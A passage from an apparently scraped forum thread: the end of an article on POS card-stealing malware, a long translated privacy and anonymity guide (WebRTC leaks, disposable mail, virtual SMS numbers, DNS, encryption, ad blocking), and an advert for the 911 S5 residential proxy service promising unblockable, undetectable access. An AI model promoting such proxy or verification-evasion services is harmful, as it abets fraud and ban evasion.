a terminal that fully complies with the data security standards of the payment card industry.Are the ideas of these viruses so new?Despite all the noise raised in the media and the Internet in early 2013, a similar attack pattern was demonstrated in 2010 by Trustwave employees at DEF CON 18. In their report "Malware Freakshow 2", Trustwave employees demonstrated malware that can extract applications from memory track1 / track2. Presentation slides are available here.ConclusionDespite their primitiveness, the considered malicious programs successfully cope with the tasks assigned to them. However, in the future we may witness the use of more sophisticated software aimed at stealing data from POS terminals.History of successIn May 2011, an official charge was brought against four Romanian citizens of stealing data on plastic cards of US residents using POS terminals. According to the indictment, from 2008 to May 2011, Romanian attackers infiltrated more than 150 POS terminals of one of the fast food restaurant chains, as well as POS terminals of other companies. In total, hackers managed to steal more than 80 thousand data on plastic cards. In order to install their malware on POS terminals, hackers brute-force passwords for pcAnywhere, a program used to remotely control a computer.
  7. Today's material is devoted to the most common channels for transmitting information on a home or partly corporate laptop, as well as the struggle for personal safety and anonymity.Content1. How to protect your browser from data leaks.2. Temporary mailboxes3. How to get a virtual number for receiving SMS.4. We introduce a ban on determining the location by MAC address.5. Is there a possibility of data leakage on VPN?6. Checking the short URL for safety7. Protection against web mining?8. Configuring a VPN connection to block DNS leaks9. The easiest ways to protect files and folders that can be found on a USB drive.10. Improving the protection and privacy of Chrom-based browsers.11. Tools used to analyze malicious links and files12. Password security13. Resources for end-point security testing14. Blocking adsConclusion1. How to protect your browser from data leaksWhat is WebRTC?WebRTC (Web Real-Time Communication) is an open source standard that allows real-time transmission of video and audio data through any modern browser using P2P technology.This technology is built-in and enabled by default in all modern browsers - Firefox, Chrome, Chromium, Yandex Browser and Opera.How does WebRTC work?With WebRTC, users of multiple browsers can transfer their data to each other. No proxy server is required to store and process data. All data processing takes place through a browser or mobile applications. How WebRTC worksDangers of WebRTC Vulnerabilities and Information LeaksThe biggest danger from using WebRTC is that this web technology detects your real IP address. When your connection is directly linked to any other user, website, browser, or any mobile application, the network settings are limited. To link to audio and video, the browser must work with local IP addresses.The best solution to protect against IP leaks is to disable WebRTC technology if you are not using it. Although WebRTC uses local encryption to ensure the confidentiality of communications, there is still a general consensus among security experts and experts that the technology is less secure than conventional conferencing services. This technology poses a danger to users' browsers, which can be attacked by malware.The aforementioned P2P technology asks for the user's real IP address when exchanging information, and WebRTC is kind enough to share this information with anyone. Even if the user is working through VPN or TOR using this miracle of technology, an attacker can easily find the user's IP address. Taking advantage of the security holes, it will of course be able to figure out your IP address, which is your real IP.The aforementioned P2P technology asks for the user's real IP address when exchanging information, and WebRTC is kind enough to share this information with anyone. Even if the user is working through VPN or TOR using this miracle of technology, an attacker can easily find the user's IP address. Taking advantage of the security holes, it will of course be able to figure out your IP address, which is your real IP.1.1 Testing WebRTC on capacity leakage dataWebRTC can reveal your real IP address to the sites you visit. This is a serious threat to those who use VPN services and monitor their online privacy. The problem is that users are usually not aware of this feature, and in popular browsers like Google Chrome and Mozilla Firefox, WebRTC is enabled by default. Hence, when sending requests to STUN servers, you can get the user's external and local IP addresses.To check for a WebRTC leak, connect to a VPN service and run the WebRTC leak test. The leak will be identified if your real IP address is shown.VPN is not an option eitherPower users use VPN connections to hide their real IP address. Thus, in this scenario, in most cases, only the local device address assigned by the VPN will be discovered. However, there is a loophole that allows you to reveal your real IP address even when using a VPN service.If you are using a proxy server, WebRTC will determine your actual proxy IP, or the VPN server IP if you are using a VPN and proxy bundle. Another reason to disable WebRTC when using a proxy is to reduce the efficiency of the proxy connection.1.2 Disable WebRTC in ChromeIn order to completely disable the WebRTC technology in Chrome, you can use the WebRTC Control extension. Install the extension and activate it. The plugin icon should turn blue, which means that you are now protected.1.3 Disable WebRTC in FirefoxFirefox is one of the few browsers that allows you to disable WebRTC without installing additional plugins. If you're not using the WebRTC tool, it's easy to disable it entirely. When the need arises to use it, sometimes it makes more sense to install a Firefox plugin.To disable WebRTC in Firefox, type about: config in the address bar and press Enter. Then press with all your might on the button "I'm taking risks!".Enter media.peerconnection.enabled in the search bar. Select the appropriate entry, right-click and select the Toggle option. WebRTC is now disabled in Firefox. You can also install the WebRTC control add-on to quickly enable and disable WebRTC.1.4 Disable WebRTC in Yandex BrowserTo completely abandon the WebRTC technology in Yandex Browser, you can use the WebRTC Control extension. Install the extension and enable it. The plugin icon should turn blue, which means that you are now protected from leaks.1.5 Disable WebRTC in OperaTo completely abandon the WebRTC technology in Opera, go to Menu> Settings> Security, check the Show advanced settings box and in the WebRTC section select Disable unprocessed UDP.2. Temporary mailboxesFor some left-handed sites or personal accounts, in which you will use only once, a disposable mail or a temporary mailbox will work. Therefore, when you register on any site, you can specify the email address of one of your temporary mailboxes. When you receive an email with a link to confirm your registration, activate your account by clicking the link in the email. You can close a temporary mailbox and forget about it - it will be automatically deleted after a certain period of time.Most often, on such services, you only need to write the username before the @ symbols. that is, the first part of the email address, after which you access the contents of the mailbox. There are also services that allow you to create a temporary mailbox in which mail will be automatically forwarded to your real email address.Please note that temporary mailboxes do not require a password to access temporary mailboxes. This is especially dangerous if emails with registration data have been sent to your inbox (as some websites do). Therefore, to increase the level of security, it is recommended to create temporary mailboxes with address names (logins) in the form of a chaotic set of characters - for example: 4еdxgr083278@notagone.com or cmpiodwvexsk@yopmail.com.2.1 СrazymailingCrazy mailing - excellent service, which provides a temporary mailbox for free. I myself use this site and it suits me perfectly. So what functionality does it provide? temporary mailbox (10 minutes) with the possibility of infinite extension (press the button to the right of your temporary address - and another 10 minutes are added) the ability to receive, write and forward messages. plugins for firefox / chrome that allow you to create a new temporary mailbox "in one click" Also, the site has a good built-in editor and the ability to attach a file up to 10 MB to a letter. In order to prevent spam, a header with the sender's ip-address is added to each sent message.2.2 TempMailTempMail provides a temporary mailbox for 60 minutes (renewable). There is no possibility to send letters. I was pleasantly pleased with the possibility of manual selection of the mailbox name and "human domain".After the specified time has elapsed, the box can be removed. Otherwise, a simple, convenient service.2.3 Discard.EmailDiscard.Email isby far the most sophisticated temporary mail service. Provides a choice of mailbox name and domain. There are several dozen domains to choose from. Mail is stored for 30 days. What are the features of this service? Receive text and HTML emails with attachments Reading, writing and responding to emails Printing and saving received e-mail Letters are kept for 30 days Various domains available Some domains allow password protection Use your own domain - privately and anonymously Read incoming emails in RSS or ATOM feed Direct access to the created mailbox from bookmarks Managing your own spam list Fast delivery and receipt of letters Can be used on computer, tablet, smartphone.As you can see, the list of features of this service is quite long 😃 Also, Discard.Email has its own plugin for Firefox.2.4 YOPmailDisposable service of YOPmail e-mail boxes. mailbox in the yopmail.com domain to choose from random email box generator add-on for firefox and internet explorer and widget for opera for quick access to mailbox setting up automatic forwarding from a temporary mailbox to your main email address alternative domains (all letters received to your temporary mailbox in any of the alternative domains are automatically forwarded to the mailbox in the yopmail.com domain) letters are stored for 8 days e-mail without a password - access to the mailbox by link or mailbox name your own YOPmail chat How to get a virtual number for receiving SMSTo receive SMS online, there are special websites that provide a special virtual number to which you can receive an SMS message. Receiving SMS over the Internet can be used primarily to increase anonymity. By using virtual numbers, the user can avoid being tracked online.Here are some examples of using services to receive SMS messages. To receive SMS online confirmation. SMS online via the Internet can be used when registering on social networks, classmates, vkonatke, etc. Also, receiving SMS online may be needed when registering mailboxes. 3.1 SellaiteLet's start with the Sellaite website. This site allows you to receive SMS online for free using any of the numbers available at the time. The service does not require registration. To receive SMS online, go to the website page and click on the available number.Remember that the SMS number provided to you may change at any time. Therefore, register in it only what does not require further confirmation and a link to the number.3.2 Receive-SMS-OnlineThe next site is Receive-SMS-Online. Among the possible virtual numbers, there are often Russian and Ukrainian numbers. Which can be very helpful for our audience. Registration is not required to receive SMS. We enter, choose a number and send an SMS.3.3 FreeOnlinePhoneFreeOnlinePhone - The site offers online numbers for receiving SMS. There were no Russian numbers, but the site is still working stably.3.4 ReceiveSMSOnlineReceiveSMSOnline is another service that offers a virtual number for free. There were delays in testing this service. From one SMS source it took about 20 minutes, from another about 30.3.5 ReceiveFreeSMSThe next service is ReceiveFreeSMS. Offers a free virtual number. And not a number, but a whole bunch of virtual numbers from different countries.4. We introduce a ban on determining the location by MAC addressNow we will talk about how to find out the location of a person by the MAC address of his network card.Google Maps is a default service, which obviously means either you use the device and consent to your older brother to receive geographic information, or you opt out of using your mobile device. And it's up to you to decide.We find out the geographic location using Mapping a web browser to GPS coordinates via router. We go to the site and at the bottom we see such an unremarkable window, where we will enter the MAC address of our router. After entering, in a couple of seconds, the interface of the Google Maps service, which is familiar to us all, will appear, on which, almost with an accuracy of several meters, the location of your router will be indicated by a point.How to protect yourself?Cut off all geolocation, do not use Google Maps and do not link your photos to geolocation.5. Is there a possibility of data leakage on the VPN?Each user can see how effectively the chosen VPN service protects data privacy - whether it hides your real IP address, your actual location, and data about the Internet provider being used. With a VPN, it is expected that all traffic sent and received over an encrypted channel will be well protected. This includes your real IP address, your actual location, and information about the Internet service provider you are using. If this information is available to third-party resources, then tracking your activity is not very limited, and the data about your actions can be used not only for advertising purposes.5.1 Checking the IP addressAn IP address is a unique number assigned to the router by your Internet service provider. All devices connected to the home network receive their own internal IP address: computers, smartphones, game consoles, smart devices, etc. In this case, we are interested in the public external IP address.IP addresses are usually associated not only with Internet service providers, but also with specific locations. If a third party service receives your IP address, it can approximate your location.IP addresses come in several formats: IPv4 (Internet Protocol Version 4), for example , or IPv6, for example .172.16.254.12001:0db8:0012:0001:3c5e:7354:0000:5db1To find out your IP address, enter “my IP address” in Yandex or use third-party services such as whatismyipaddress.com, whatismyip.com, or 2ip.ru. Some services not only show the address itself, but also indicate your location, determined by your IP address.5.2 Checking for DNS LeaksThe Domain Name System (DNS) allows you to resolve IP addresses to familiar domain names. The user enters the domain name into the browser and DNS resolves the connection to the corresponding IP address of the web server domain. ISPs have their own DNS servers to simplify the conversion process - as a result, they get a different way to track users.In fact, using a VPN means that in theory your internet traffic will be redirected to anonymous DNS servers. If your browser just sends a request to your ISP, there is a DNS leak.There are easy ways to check for a DNS leak using the Hidester DNS Leak Test , DNSLeak.com, or DNS Leak Test.com services. These sites return information about your IP address and the owner of the DNS server used. If the results show a service from your ISP, a DNS leak occurs. DNS Leak CheckLeakage protectionWhen a leak is detected, there are several possible options for further action. First of all, you can change the VPN service to one that prevents DNS leaks.You can also change the DNS servers your router uses when sending requests to the Internet. You can use alternative DNS services: Google Public DNS, Comodo Secure DNS, Norton ConnectSafe, or OpenDNS.6. Checking the short URL for safetyThe full path of the original link is masked by the URL shortening, and its true purpose is unknown. From this condition, it becomes necessary to validate shortened URLs for security.What is the problem?Abbreviated links are indispensable in applications that impose character limits. The popular microblogging service Twitter has a 280 character limit for each post. The T.co abbreviation service shortens links to 23 characters and can only be used by platform users. The links use the domain name t.co. This allows Twitter to count clicks on each link and check for malicious content. Twitter itself checks the shortened URLs for the safety of blacklisted malicious sites. If the link points to possible malicious content, Twitter displays a warning.6.1 TinyURLTinyURL also provides a preview function. When creating a TinyURL, a preview link is available on the link page. Add the "preview" prefix in front of the TinyURL link to check the target URL. TinyURL6.2 CheckShortURLT.co, Bitly or TinyURL links provide some security guarantees. But what about links created by other shorteners? Many sites offer a method to validate shortened URLs for security purposes. One such site is CheckShortURL. It supports most of the popular link shortening services. Enter a short link in the search box and click Expand. CheckShortURLThe original destination link appears on the results page. You can check the safety of a link before visiting it using public services such as Norton Safe Web.6.3 Unshorten.ItAnother site for viewing link shortened URLs Unshorten.It!. Enter the shortened link in the search box, then click the Expand button.7. Protection from web mining?Cryptojacking is a new type of Internet threat. This term refers to cases where websites use the computing power of the devices of site visitors to mine cryptocurrencies.The biggest problem with cryptojacking is that digital currencies are mined against the will of the user . Sites secretly run miner scripts to use the resources of visitors' computers. Users often have no way to skip this process, and they don't even understand what's going on.Many web resources use miner scripts for monetization. Cryptocurrency mining operations take place in the background and do not interfere with the loading of the main site content. Browser extensions can also download cryptominers. They run in the background like scripts.Checking the browserThis website - https://cryptojackingtest.com was created by Opera Software engineers. It allows you to check the effectiveness of your browser's protection against cryptominers. Website cryptojackingtest.comVisit the website and click the Start button to run the test. The mining process will take a few seconds. As a result, you will know for sure whether your browser is protected from web miners or not. Result of checkingMiner detection in Google ChromeMany users are often unaware that their computer is being used for unwanted mining. Typical signs of this process are computer slowdowns, freezes, or even a forced restart. If you switch to Task Manager in Windows, you find that Chrome processes are consuming an unexpectedly large amount of CPU resources.This way you can really recognize the strange behavior of Chrome, but you will not be able to figure out additional useful information: which extension or tab was using all the free CPU resources. Luckily, Google offers a built-in tool called Task Manager to help you figure it out.Determine which sites consume a lot of CPU resourcesIf your Google Chrome browser is using too much CPU resources, the first thing to do is determine if the site or an installed extension is causing this situation. In our example, we open a test site created by the Badpackets portal, which contains a built-in web miner CoinHive that uses up to 100% of the available CPU resources.You can launch Task Manager in Chrome using the Shift + Esc hotkey or in the main menu: Chrome menu> More Tools> Task Manager.Upon completion of the launch, the tool will display a list of all running processes and the level of CPU resource consumption. For each site, extension, internal process, or subframe, a separate process is shown in the list. The user can check the list and determine which site is wasting the most CPU resources. To close this tab, select it from the list and click the End Process button . After that, the normal operation of the computer will be restored and it will be useful to add the malicious site to the black lists of an antivirus or ad blocker.How to protect yourself from mining?Users who are not protected can be given several recommendations: Use browser extensions to protect against miner JS scripts. For example NoScript and uMatrix. Use the Opera browser with built-in content filter or anti-banners for Google Chrome, Mozilla Firefox and Microsoft Edge. Use antivirus to protect against miner scripts. For example, Kaspersky Free and Norton Security. Install the extension against miners. For example, the No Coin extension available for Google Chrome, Mozilla Firefox, and Opera. Disable JavaScript on questionable sites. We continue to talk about the issues of ensuring personal security, anonymity and secrecy on the Internet on our own. Here are some more useful tips, settings, tricks and tricks for a home and partly corporate computer that you can perform on your own.8. Configuring the VPN connection to block DNS leaksTo keep DNS domains secure over VPN connections, it is highly recommended that you disable Smart Multi-Homed Name Resolution in Windows 8.1 and Windows 10 so that DNS requests are not forwarded outside of your secure VPN connection.8.1 Setting in Windows 8 and 8.1The following registry tweak can only be applied on Windows 8 and 8.1 systems, it does not work on Windows 10. Open the Registry Editor: press the Windows key, then type regedit.exe and press Enter. A User Account Control prompt will appear, confirm it. Follow the path: HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows NT \ DNSClient. If the DisableSmartNameResolution parameter already exists, make sure its value is 1. Otherwise, right-click the DNSClient directory and select New > DWORD (32-bit) Value from the menu. Name the parameter DisableSmartNameResolution. Set the value to 1. You can re-enable the function at any time by simply setting the value to 0 or simply deleting the parameter. Go to the path: HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Dnscache \ Parameters. If the DisableParallelAandAAAA parameter already exists, make sure its value is 1. Otherwise, right-click the Parameters directory and select New> DWORD (32-bit) Parameter from the menu. Name the parameter DisableParallelAandAAAA. Set the value to 1. You can re-enable the function at any time by simply setting the value to 0 or simply deleting the parameter. You can then close Registry Editor and restart Windows to apply the changes.8.2 Setting up Windows 10The following method works in all versions of Windows 10, as well as Windows 8 and 8.1.Disable Enhanced Multicast Name Resolution. Open the Local Group Policy Editor: press the Windows key, then type gpedit.msc and press Enter. Go to Computer Configuration> Administrative Templates> Network> DNS Client> Disable Enhanced Multicast Name Resolution. Set the policy status to Enabled to disable this feature in the system. Restart Windows to apply the changes.9. The easiest ways to protect files and folders that can be found on a USB stickAnd so a few simple tips and ways to ensure the confidentiality of your personal files9.1 Protecting individual files with a passwordSetting up password protection for individual MS Word files.If you only need to protect important individual documents and don't need to encrypt entire folders, you can simply limit yourself to setting up password protection for individual files.Most programs, such as Word and Excel, have the option to save data with a password. For example, if the document you want is open in Microsoft Word, you can go to File> Info, choose Protect Document, then choose Encrypt password.It remains only to define a strong password and confirm its installation. Remember to save the document and remember to remember or write down the password.9.2 VeraCrypt Encrypted File ContainerVeraCrypt cryptographic security software can be used as a portable application and run directly from a USB stick. The program requires administrator rights. The program supports the creation of a virtual encrypted hard disk that can be mounted like a physical hard disk.VeraCrypt currently uses real-time encryption technology using a variety of algorithms, including 256 bit: AES, Serpents and TwoFish and combinations thereof.Download the portable version of VeraCrypt and unzip it to a USB stick. When you launch the application, a list of available drive letters will be displayed. Select a letter and click "Create Volume". The VeraCrypt Volume Creation Wizard will start.To create an encrypted virtual disk in a file, select the Create Encrypted File Container option and click Next.The next step is to choose the type of volume: regular or hidden. Using a hidden volume reduces the risk of someone forcing you to reveal your password. In our example, we are creating a regular volume. Next, select the location of the encrypted disk - Removable Disk.Configure encryption and specify the size of the volume (must not exceed the size of the USB drive). Then select the encryption and hashing algorithm, you can use the default settings. Then set a password for the volume. In the next step, your random mouse movements will determine the cryptographic strength of the encryption.After encryption is complete, every time you plug a USB drive into your computer, you can launch the VeraCrypt hosted on it and mount the encrypted file container to access data.9.3 Encrypt USB Drive CompletelyVeraCrypt also supports encryption of entire partitions and storage devices.Download VeraCrypt and install the program on your computer. When starting the application, a list of available drive letters will be displayed. Select a letter and click "Create Volume". The VeraCrypt Volume Creation Wizard will start.To encrypt the entire USB drive, select the Encrypt non-system partition / disk option and click Next.The next step is to choose the type of volume: regular or hidden. Using a hidden volume reduces the risk of someone forcing you to reveal your password. On the next screen of the wizard, you need to select a device, i.e. our removable USB drive, then click "OK" and "Next".In our example, we will create a regular volume. On the next screen of the wizard you need to select a device, i.e. our removable USB drive, then click "OK" and "Next".To encrypt your entire USB drive, select Encrypt Partition In Place and click Next. VeraCrypt will warn you that you should back up your data - if something goes wrong during encryption, you can restore access to your files. Then select the encryption and hashing algorithm, you can use the default settings. Then set a password for the volume. In the next step, random mouse movements will determine the cryptographic strength of the cryptography.Then select the cleaning mode. The more rewriting cycles, the more reliable the cleaning. In the final step, select Encryption to start the encryption process.After encryption is complete, every time you plug the USB drive into your computer, you will need to mount it using VeraCrypt to access the data.9.4 Password protection of the archiveModern archivers like the free 7-Zip support AES-256 encrypted compression and password protection.Install 7-Zip, then right-click a file or folder on your USB drive and select 7-Zip> Add to Archive. In the "Add to archive" window, select the archive format and set a password. Click "OK" to start the archiving and encryption process.10. Improving protection and privacy of Chrom-based browsersAll modern Chromium-based browsers have a Google Safe Browsing blacklist to protect users from known dangerous sites. They all have built-in sandbox isolation protection that makes them less vulnerable to attack, and they update quickly when any vulnerabilities are found. If you don't want to trust Google Personal Information with the Google Chrome web browser, there are several alternatives.10.1 Useful extensionsWeb of Trust (WOT) - after installing this extension, if you accidentally stumble upon a potentially unsafe site, WOT will close the warning screen and wait for your decision to stay or leave the site. If you combine this with your own common sense, you will be protected from many of the dangers on the web.Bitdefender TrafficLight - After installing this extension, if you come across a dangerous website blacklisted by Bitdefender, the plugin will block the page from loading. Bitdefender TrafficLight allows you to block malicious sites, phishing and fake sites.Adblock Plus for Google Chrome - This extension allows you to subscribe to updates from many different filter lists to help you block unwanted or malicious website content. You can subscribe to any of the lists available, but keep in mind that subscribing to too many of them will slow down your website experience. I recommend subscribing to the EasyPrivacy + EasyList combo and the Malware Domains combo.ScriptSafe - This add-on blocks the execution of almost all scripts and other potentially dangerous content. This means that even if you come across a dangerous site, you cannot be attacked unless you manually add the scripts for that site to your whitelist. This way you are protected from malicious scripts and many privacy threats. ScriptSafeAll chromium-based browsers provide the ability to launch the browser in incognito mode . When you work in this mode, most of your online traces will be deleted as soon as the browser is closed. This is not enough to adequately protect your privacy, but it’s already something.What security changes should I make to improve my privacy?Go to settings and click on the "Show advanced settings" link at the bottom of the page. In the "Personal Information" section , clear the "Use a prediction service to help complete searches" check box . Also, make sure that Predict network activity to improve page load performance is disabled in any browser.For all browsers, you must also select the "Send a 'Do not track' request with your browser traffic" option . Google Chrome users may also want to disable the "Use a web service to help resolve navigation errors" option.Now open "Content Settings" and select "Block third party cookie settings". This will prevent the download of cookies from a website other than the one you intend to visit. This way, almost all tracking cookies will be blocked with the least negative impact on your online experience.In the "Privacy" section of the main settings page, check the "Don't tell sites how you got there (don't send the HTTP referrer header)" box . Please note, however, that this may cause problems with some sites and that some sites may need to be disabled in order for them to work properly.HTTPS Everywhere - This extension encourages many sites that have the ability to encrypt your connection, actually encrypt it. This way, your connection to these sites will be much safer.LastPass is a robust password manager that automatically inserts passwords and fills out forms. This not only helps protect your passwords and secrets from damage, but it also allows you to confidently create strong passwords and change them frequently.Do Not Track Me - This extension prevents third parties, advertising agencies and search engines from tracking which web pages you visit. Do not track me11. Tools used to analyze malicious links and filesEvery day, malicious websites and attachments try to trick users into downloading dangerous content. Fortunately, there are many online resources and tools that can help you figure out which sites are safe and which are a trap to steal your personal information and money.Let's start with the well-known VirusTotal resource. When you receive an email with a ZIP archive, it will be helpful to check the attached file using this service.There are a number of other web resources that help detect malicious files or links, namely: fortiguard.com/antivirus/virus_scanner.html - This site scans for malicious files and reports on potential security issues; hybrid-analysis.com - You can upload files to this site, but cannot work with archives; malwr.com/submission - Allows you to upload files and check which processes will be started. The service also shows how many VirusTotal antivirus engines have worked. metascan-online.com is another site for checking potentially dangerous files that may contain malicious content; phishtank.com - checks if the resource is contained in the database of known fraudulent sites; urlquery.net - (note that the net domain zone is used, the address in the com zone is registered by an unauthorized person) this service scans site links for malicious files and dangerous activity There are advanced tools for examining malicious web servers and their locations, or for tracking down dangerous emails.Again, many of the tools are available from the Internet, here are just a few of them. abuseipdb.com - a resource that checks the malicious activity of other sites (there is no HTTPS support); ipvoid.com - this site allows you to check if a specific IP address has been involved in malicious activity (there is no HTTPS support); mxtoolbox.com/Public/Tools/EmailHeaders.aspx - Enter the message header to determine where it was sent from. quttera.com/website-malware-scanner - Checks websites for malicious activity. virustracker.net - Analyzes if the IP address has been involved in malicious activity. MxToolbox decrypts email message headers for diagnostic information Checking a website using the urlQuery service[B12. Password security[/B]Password security is one of the problems that constantly worries the modern person. The confidentiality of personal life largely depends on the degree of secrecy of passwords. Today, access to almost any application, private and commercial information is password-based and requires registration.The first step in keeping passwords secure is to avoid using a single word password. And not because the password for the word is too short, but because this password is very predictable. Did you know that there are databases used by hackers that contain all words in any language? The purpose of these databases is to help hackers guess passwords with simple word searches. This technique is called a dictionary attack, which can also take the form of a rainbow table attack.12.1 Password managerPassword managers are applications that help us store and organize our passwords. The only password you need to remember is the password for the password manager itself.Sticky Password is a reliable password manager with local database and cloud sync. Supports Windows, Mac, Android, iPhone and iPad, bookmarks, create and securely store passwords, automatically sign in to websites, fill out online formsKeePass Password Safe is a free open source password manager for Windows. Allows you to store passwords in a well-encrypted database, access to which is closed with a master password or key file 2018-11-02LastPass is a password manager app for popular web browsers, systems, and mobile devices. The LastPass plugin makes visiting websites easier and safer.Kaspersky Password Manager is a password manager with cloud storage and data protection functions, autofilling authorization fields and data substitution, automatic data synchronization on all devices.Norton Password Manager is a free password manager that lets you log into the websites you visit quickly, easily, and securely. A simple password manager for your web browser, Android smartphone, iPhone and iPad12.2 Two-factor identificationTwo-factor authentication is another obstacle to keeping your passwords secure. After entering the password, the authorization system will require an additional authentication method to log into your account. Specifically, the second verification factor could be the temporary digital code generated by the authentication app on your mobile device.Access will be granted if the login (username or email address), password and secret code are entered correctly. Two-factor authentication is the most secure way to keep your passwords safe as access will not be granted without the additional credentials entered correctly.13. Resources for testing end-point protectionA list of free and well-known tests that are used to simulate a malicious attack. Anti-malware Testfile - European Institute for Computer Anti-Virus Research Test your anti-Malware solution! - WICAR.org Security features check - Anti-Malware Testing Standards Organization SmartScreen Demo Pages - Microsoft Test Your Metal - Fortinet CheckMe - Check Point ShieldsUP! - Gibson Research Corp. LeakTest - Gibson Research Corp. Security Test Tool -SpyShelter For a more complete assessment of the effectiveness of your protection, use links and files from several sources. Also, do not take the test results as final.[B14. Blocking ads[/B]AdFender - Supports a wide range of web browsers including Chrome, Firefox, Microsoft Edge, Internet Explorer, Opera.Adguard for Windows is a multifunctional internet filter that blocks ads in many browsers and applications without the need to install extensions. In addition to the anti-banner, it includes anti-phishing, anti-tracking, parental control. For Comss.ru users, all functions are available free of charge for 6 months. The developer also offers apps for Android, Mac and iOS.Ad Muncher is a popular program for blocking online ads and pop-ups in most browsers. Supports creating your own filters. It became free with full functionality at the end of 2014 but hasn't been updated since then.14.1 Extensions for Chrome, Firefox and Microsoft Edge Currently, several major ad blockers offer extensions and add-ons for Chrome, Firefox and Edge. Let's list the most popular blockers:AdBlock for Chrome / AdBlock for Edge is the most popular ad blocker with over 200 million downloads. There was a Firefox version, but the extension was removed for unknown reasons. AdBlock allows you to receive ads from Youtube and Google searches, but these options are disabled by default.AdBlock Plus for Chrome / AdBlock Plus for Firefox / Adblock Plus for Edge is one of the most famous ad blockers, also very controversial because it was AdBlock Plus who originally introduced the practice of using ad whitelisting. The AdBlock Plus site also offers versions for Opera, Safari, Maxthon, Internet Explorer, and even Android.Adguard for Chrome / Adguard for Firefox / Adguard for Edge is easy to use and makes it easy to add additional scripts to block.Stop Reclame for Chrome is an effective solution to remove intrusive ads. An extension for Opera and Yandex Browser is also available.uBlock Origin for Chrome / uBlock Origin for Firefox / uBlock Origin for Edge is a promising script blocker for Chrome and Firefox. has good optimization and minimal impact on processor and memory. Not all ads are blocked by default, but you can add blacklists. The user can allow or block the extension to work on individual sites in advanced mode.14.2 Alternative solutions for ad blockingAdguard DNS provides an easy way to filter ads through the domain name system. You can change DNS for a specific device or configure your router to filter internet traffic for all connected devices - Windows, Mac, Linux, Android, iOS.Adguard Home is a DNS server that blocks ads and tracking at the network level. Its function is to give you complete control over the network and all your devices without installing any client applications. At the same time, AdGuard Home offers a web interface with which you can easily manage the filtering process.Pi-Hole offers an advanced ad blocking solution on all devices connected to your home network. You will need a Raspberry Pi single board computer and some technical knowledge. All traffic is routed through a separate device that filters the content.14.3 Using third-party DNS servicesYour ISP provides DNS servers for you, although you don't have to use them. Instead, you can use third-party DNS servers that provide many features that your ISP does not have.Third party DNS servers such as OpenDNS and Google Public DNS also offer protection that many ISP DNS servers have not yet implemented. For example, Google Public DNS supports DNSSEC to ensure correct signature and reliability of DNS queries. Your ISP's DNS servers may not have implemented these security features yet.UnoDNS and Unblock-Us work in the same way and do not have this limitation, but on the other hand, you have to pay for them. UnoDNS and Unblock-Us. Access to geo-blocked contentNamebench includes an option that checks DNS servers for censorship to determine if current DNS servers are being censored. Namebench. Bypassing web censorshipConclusionIn the end, we can say that you cannot remove the left fingerprints, but you can take preventive measures. This will keep your data safe. If you are aware of all the possible risks, you can avoid them. You can start small. Install, for example, an ad blocker, use end-to-end encrypted apps, and only visit HTTPS sites. As you take these small steps, you will feel a huge difference.That's all! If you do all these simple tricks, you can be a little more confident that your personal information, even if it is not very sensitive, will not be shared with anyone. In any case, ordinary amateurs will definitely not get it!(c) cryptoworld.su
  8. https://911.re911 S5 is the largest business residential proxy service. Access to millions of quality clean/fresh residential IPs in every city in the world with unmetered bandwidth and no expiration date.WE PROVIDE YOU!DEVELOPERS APIFor maximum freedom we offer API access to proxy IPs by country, state, city, IP range, ZIP, ISP etcFREE SOFTWAREWe offer software for using our proxy with many useful features for privacy protection, and its all freeWINDOWS OSOur software supports all Windows OS from XP to Win 10LIFETIME VALIDITYProxies balance have no expiration date on them, valid for lifetime in your accountSECURE ENCRYPTIONStrong encrypted communication to ensure highest anonymity with using SOCKS5 protocolUNMETERED BANDWIDTHFree yourself from bandwidth fees and send unlimited requests without per-gigabyte chargesBACKCONNECT SOCKS5 PROXIES911 S5 OFFERS A RESIDENTIAL PROXY NETWORK THAT IS ROBUST BY DESIGN THAT FEATURES CLEAN/FRESH IP'S BECAUSE ITS A PRIVATE NETWORK FOCUSING ON QUALITYUndetectableProxy peers in our network are from home standard ISP. Avoid blocks and bans and be seen as a regular visitorSales IntelligenceUnderstand who are the best customers for your serviceBrand ProtectionMonitor the web for proper use of your brand to protect your Intellectual Property, trade marks, and pricing strategyAd VerificationAd networks use proxies to anonymously view their advertisers' landing pages to ensure they don't contain malware, or improper advertisingSelf-TestingTest your web properties from any city in the worldHundreds of UsesOur proxies are built for businesses that need complete freedom for their application. Whether it's URL scraping, account creation or for SEO; our proxies can handle the taskNever get blockedWHEN SENDING REQUESTS VIA RESIDENTIAL IPS, IT'S VIRTUALLY IMPOSSIBLE TO GET BLOCKED OR CLOAKEDUnlimited residential ipsMILLIONS OF FRESH CLEAN IPS UPDATE EACH DAY FROM THE 911 S5 PRIVATE NETWORKIn every city in the worldUSE THE LARGEST PROXY NETWORK IN EVERY COUNTRY, CITY IN THE WORLDSouth AmericaUSA & CanadaEuropeAsiaPRICES FOR 911 S5 PROXIESAll purchased proxies balance in your account are valid for lifetime, no expiry date!Using 1 proxy costs 1 proxy balance and you can use from any country, or city without limit!99% of our proxies are already checked and available so you don't waste any proxies balance!Our software is compatible with any software, tools or games and third party applications!All our proxies use the socks5 protocol with strong encryption to ensure highest anonymity!Terms of Service911 PLATFORM TERMS OF USE1. Your AcceptanceWelcome to the Terms of Use for 911. This is an agreement (“Agreement”) between International Media Ltd. (“911"), the owner and operator of 911.re and 911.gg website and any associated downloadable software or services offered (collectively the “Platform”) and you (“you”, “your” or “user(s)”), a user of the Platform.Throughout this Agreement, the words “911,” “us,” “we,” and “our,” refer to our company, 911, as is appropriate in the context of the use of the words.By clicking “I agree”, accessing, or using the Platform you agree to be bound by this Agreement and the Privacy Policy. We may amend our Terms of Use or the Privacy Policy and may not notify you when we do so. The current version of the Agreement is available on our website. You understand and agree that it is your obligation to review these terms and conditions from time to time in order to stay informed on current rules and obligations. Your continued use of the Platform following any revision of the Platform or this Agreement constitutes your complete and irrevocable acceptance of any and all such changes. PLEASE BE AWARE THAT THERE ARE ARBITRATION AND CLASS ACTION PROVISIONS THAT MAY AFFECT YOUR RIGHTS. If you do not agree to the Terms of Use or the Privacy Policy please cease using our Platform immediately.911 has developed, owns and offers a service which enables browsing the internet anonymously by redirecting users’ communication through other users' devices(the "System"). This is available for commercial use under this Agreement.During the term of this Agreement 911 granted you to access and use the System solely for the purpose of Client's internal business operations.911 reserves any and all rights not expressly granted in this Agreement, including, without limitation, any and all 